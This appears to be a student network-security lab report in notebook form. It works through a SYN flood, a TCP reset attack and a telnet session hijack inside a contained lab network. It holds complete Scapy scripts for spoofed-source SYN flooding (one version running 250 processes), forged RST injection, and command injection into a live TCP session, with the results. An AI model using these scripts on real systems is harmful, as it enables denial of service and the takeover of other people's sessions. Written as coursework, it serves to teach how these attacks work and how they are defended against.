## Lab Description

In this lab, we first explore TCP vulnerabilities through a SYN flooding attack to understand how excessive SYN requests can overwhelm a system's queue for half-open connections, preventing new connections. Next, they conduct a TCP reset attack to terminate an established TCP connection, highlighting the importance of secure session management. Finally, they execute a TCP session hijacking attack, demonstrating the potential for malicious command injection into an active session to manipulate or disrupt typical network communications.


## Task 1

In this task, we attempt to execute a SYN flooding attack, where the goal is to overwhelm a victim's TCP port with excessive SYN requests without completing the 3-way handshake. This method floods the queue for half-open connections, preventing the system from accepting new legitimate connections and leading to a denial of service.


### Task 1A

Launch a SYN flood to overload the target server's connection queue with incomplete requests.


We execute this script on the attacker's side to generate and send a flood of incomplete SYN requests to the target server, testing its handling of such attacks.


In [None]:
#!/bin/env python3
from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits

victim_ip = "10.9.0.5"
destination_port = 23

ip = IP(dst=victim_ip)
tcp = TCP(dport=destination_port, flags="S")
pkt = ip / tcp

while True:
    pkt[IP].src = str(IPv4Address(getrandbits(32)))  # Randomize the source IP address

    pkt[TCP].sport = getrandbits(16)  # Randomize the source port

    pkt[TCP].seq = getrandbits(32)  # Randomize the sequence number

    send(pkt, verbose=0)  # Send the packet

2. The attack is unsuccessful because the telnet command could connect to the victim machine, indicating the SYN flood didn't prevent the connection.


3. The strategy involved launching a SYN flood attack by continuously sending TCP SYN packets to the victim's IP address, with each packet having a randomly generated source IP and port. This should have overloaded the victim’s TCP stack, preventing legitimate connections from being established.


### 4. Screenshot showing the usage of the telnet command


![Question2](./1a/telnet.png)


### 5. Screenshot of the output of netstat -nat on the victim machine


![Question5](./1a/Q5.png)


### Task 1B

We attempt to mitigate a SYN flood attack by flushing the TCP metrics on the victim machine, aiming to clear any cached successful connection data and test if previously connected clients could be affected during the attack.


We begin by flushing the TCP metrics on the Victim Machine using `ip tcp_metrics flush`

Clearing the TCP metrics means that the victim machine no longer retains information about previous connections, including those that might be considered "proven" and allowed quicker connections even during an attack. This should make the victim more vulnerable to the SYN flooding attack, as the TCP cache that helps to mitigate such attacks by reserving slots for known IPs has been reset.

![Question5](./1b/flush.png)


We then Attempt Telnet Connection from User 1 to Victim During Attack

Command: `telnet 10.9.0.5`

![Question5](./1b/telnet.png)

Despite the execution of a flush on the TCP metrics aimed at clearing cached connections on the victim machine, the user from terminal 10.9.0.6 still managed to establish a successful connection during the SYN flood attack, indicating that the attack failed to disrupt service for previously known clients. This suggests a limitation in the mitigation strategies employed, where flushing TCP metrics does not fully counteract SYN flood attacks under certain conditions.


The `netstat -nat` output on the victim machine shows numerous connections in the `SYN_RECV` state, indicating that multiple SYN requests have been received but not yet acknowledged. This suggests that the SYN flood attack is actively attempting to overwhelm the server's capacity to handle new connections, although it failed to block connections from previously recognized IP addresses.

![Question5](./1b/netstat.png)


### Task 1C

We attempt to mitigate a SYN flood attack by flushing the TCP metrics on the victim machine, aiming to clear any cached successful connection data and test if previously connected clients could be affected during the attack.


We begin by adjusting TCP Retries on Victim by running `sysctl net.ipv4.tcp_synack_retries=5`

This command sets the number of SYN+ACK retransmissions that the TCP stack will attempt on the victim machine before giving up on a half-open connection.

![Question5](./1c/retries.png)


We run multiple instances of the attack from the attacker machine

We modify the code to run it through multiple processes as follows


In [None]:
#!/bin/env python3
from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits
from multiprocessing import Process

victim_ip = "10.9.0.5"
destination_port = 23


def syn_flood():
    ip = IP(dst=victim_ip)
    tcp = TCP(dport=destination_port, flags="S")
    pkt = ip / tcp

    while True:
        pkt[IP].src = str(
            IPv4Address(getrandbits(32))
        )  # Randomize the source IP address
        pkt[TCP].sport = getrandbits(16)  # Randomize the source port
        pkt[TCP].seq = getrandbits(32)  # Randomize the sequence number
        send(pkt, verbose=0)  # Send the packet


processes = []

n = 250  # number of proccesses

for _ in range(n):
    p = Process(target=syn_flood)
    p.start()
    processes.append(p)

for process in processes:
    process.join()

We run `netstat -nat | grep SYN_RECV` to monitor the attack from the victim's machine

![Question5](./1c/netstat.png)


From User 1 Terminal, while the SYN flood attack is running, we attempt to telnet into the victim machine

![Question5](./1c/timeout.png)

1. The telnet attempt timed out, demonstrating that the SYN flood attack was successful in overloading the victim's network, resulting in a denial of service. The attack effectively saturated the TCP connection queue, thereby blocking new legitimate connections.


We also check the number of connections on the victim machine using `netstat -nat | grep SYN_RECV | wc -l`

![Question5](./1c/connections.png)

The `netstat` command output showing 128 connections in the `SYN_RECV` state confirms that the SYN flood attack generated a significant number of half-open connections on the victim machine.

2. The deployment of 128 instances, as indicated by the netstat count of SYN_RECV connections, was effective in severely impacting the network's ability to process connections. This number of instances can be considered a baseline for achieving a successful attack under similar network conditions and system configurations.


### Task 2: TCP RST attack

The objective is to perform a TCP RST attack to break an established telnet connection between two users, A and B, by crafting and sending a spoofed TCP RST packet using Scapy. The attacker is on the same LAN and can observe the traffic between A and B.


We begin by preparing the Victim and Server for Telnet Session

On the Victim (10.9.0.5) container, we initiate a telnet session to User1 (10.9.0.6). This will establish the TCP connection that you will later attempt to reset.

`telnet 10.9.0.6`

![Question5](./2/telnet.png)

We see that the telnet connection is successfuly


Next, we run a script on the Attacker (seed-attacker) container, to monitor traffic between the Victim (10.9.0.5) and the User1 (10.9.0.6). The goal is to capture a packet that belongs to the telnet session. The attacker needs to capture this to obtain the sequence number necessary for crafting the RST packet.

The code is as follows:


In [None]:
from scapy.all import *

victim_ip = "10.9.0.5"
server_ip = "10.9.0.6"
server_port = 23  # telnet port
attacker_interface = "br-2837639e6df7"


def spoof_and_reset(pkt):
    print("Received packet:")
    print(pkt.summary())

    tcp_packet = pkt[TCP]
    seq_num = tcp_packet.seq
    print(
        "Sequence number of the received packet:", seq_num
    )  # Print the sequence number

    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    tcp = TCP(
        sport=tcp_packet.dport, dport=tcp_packet.sport, flags="R", seq=tcp_packet.ack
    )
    pkt = ip / tcp

    print("Sending spoofed packet:")
    print(pkt.summary())  # Print a summary of the spoofed packet

    send(pkt, verbose=0, iface=attacker_interface)


# Start sniffing for packets
filter = f"tcp and src host {victim_ip} and dst host {server_ip} and dst port 23"
print(
    f"Sniffing on interface {attacker_interface} for packets matching filter: {filter}"
)
sniff(filter=filter, prn=spoof_and_reset, iface=attacker_interface)

Right after running the code, the program begins sniffing on the specified interface for TCP packets sent from 10.9.0.5 to 10.9.0.6 on port 23 (Telnet)

![Question5](./2/init_sniff.png)


When attempting a Telnet connection, the system unexpectedly terminates, displaying "Connection closed by foreign host." This interruption occurs due to the attacker running a script that intercepts TCP packets targeting the Telnet server. The script disrupts the connection by sending forged TCP packets with the RST (Reset) flag set, effectively ending Telnet sessions initiated by the victim.

![Question5](./2/telnet_close.png)


On the attacker machine, we observe the script receiving Telnet packets from the victim machine (10.9.0.5) destined for the Telnet server (10.9.0.6) on port 23. The script identifies the sequence number of the received packets and subsequently sends forged TCP packets with the reset (R) flag set to terminate the Telnet connection abruptly. This process is repeated each time a Telnet packet is intercepted, effectively disrupting ongoing Telnet sessions initiated by the victim.

![Question5](./2/attacker.png)


### Conclusion

The attack was successful because the attacker's script effectively intercepted Telnet packets from the victim machine, identified their sequence numbers, and sent forged TCP packets with reset flags to terminate the Telnet connections abruptly. This disruption was evident from the "Connection closed by foreign host" messages observed on the victim's side, indicating the termination of Telnet sessions.


### Task 3: TCP Session Hijacking

In this task, the goal is to demonstrate TCP Session Hijacking by hijacking a Telnet session between two machines on the same LAN. The attacker intercepts Telnet packets, identifies the sequence numbers, and sends forged TCP packets with reset flags to abruptly terminate the Telnet connections. Ultimately, the objective is to inject a malicious command into the Telnet session, causing the Telnet server to create a new file named "success" in the /tmp directory upon receiving the tenth character.


We begin by opening a Telnet session from the Victim the server (10.9.0.6)

![Question5](./3/telnet_init.png)


We run an `ls` command to view the files on the server

![Question5](./3/ls1.png)


Next, we run the following script on the attackers machine, this script does this


In [None]:
from scapy.all import *

# Server and victim IP addresses
server_ip = "10.9.0.6"
victim_ip = "10.9.0.5"

# Interface to use for packet sniffing and sending
iface_name = "br-2837639e6df7"

# Variable to track the number of characters seen
chars_seen = 0


# Function to handle each sniffed packet
def spoof(pkt):
    global chars_seen  # Declare as global to modify the variable defined outside this function

    if TCP in pkt and len(pkt[TCP].payload):
        chars_seen += len(pkt[TCP].payload)
        print(f"Total characters seen: {chars_seen}")
        print(f"Current SEQ: {pkt[TCP].seq}, Current ACK: {pkt[TCP].ack}")

        if chars_seen >= 10:
            new_seq = pkt[TCP].seq + 10
            new_ack = pkt[TCP].ack + 1

            # Prepare the malicious packet to hijack the session
            ip_layer = IP(src=victim_ip, dst=server_ip)
            tcp_layer = TCP(
                sport=pkt[TCP].sport, dport=23, flags="A", seq=new_seq, ack=new_ack
            )
            payload = ";touch /tmp/success \n"
            malicious_pkt = ip_layer / tcp_layer / payload

            # Send the malicious packet
            send(malicious_pkt, verbose=0, iface=iface_name)
            print("Malicious packet sent. Check /tmp/success on the server.")
            print("Hijack attempt made. Exiting program.")
            quit()  # Ensure quit is within the condition to execute only after the hijack attempt


# Start sniffing for Telnet packets on the specified interface
print("Starting to sniff on interface...")
sniff(
    iface=iface_name,
    filter=f"tcp and src host {victim_ip} and dst host {server_ip} and dst port 23",
    prn=spoof,
)

After the victim types the 10th character (' j ') during the Telnet session with the server at IP address 10.9.0.6, the session becomes unresponsive, and the victim cannot type anymore. This is when the hijacking happens. The attacker has specifically crafted a malicious packet that, once integrated into the session after the 10th character, disrupts the session's normal operation.

![Question5](./3/hijack.png)


As the script captures each character entered by the victim, it displays the sequence and acknowledgment numbers associated with each TCP packet. After the 10th character is captured, the script successfully injects a malicious packet intended to hijack the session.

![Question5](./3/attacker.png)


We can also see that the success file has been created on the server

![Question5](./3/success.png)


2. **Was the attack successful? Explain.**

   - Yes, the attack was successful. The attacker's script managed to send a malicious packet that executed a command (`touch /tmp/success`) on the server after observing 10 characters in the Telnet session. This shows the script was able to inject and execute commands remotely.

3. **Describe and explain your strategy to complete the attack.**
   - The strategy involved monitoring the victim's Telnet session to count the number of characters typed and then automatically injecting a malicious packet once the 10-character threshold was reached. This packet was crafted to execute a command on the server, demonstrating control over the session without the victim's knowledge, exploiting the established trust between the victim and the server.
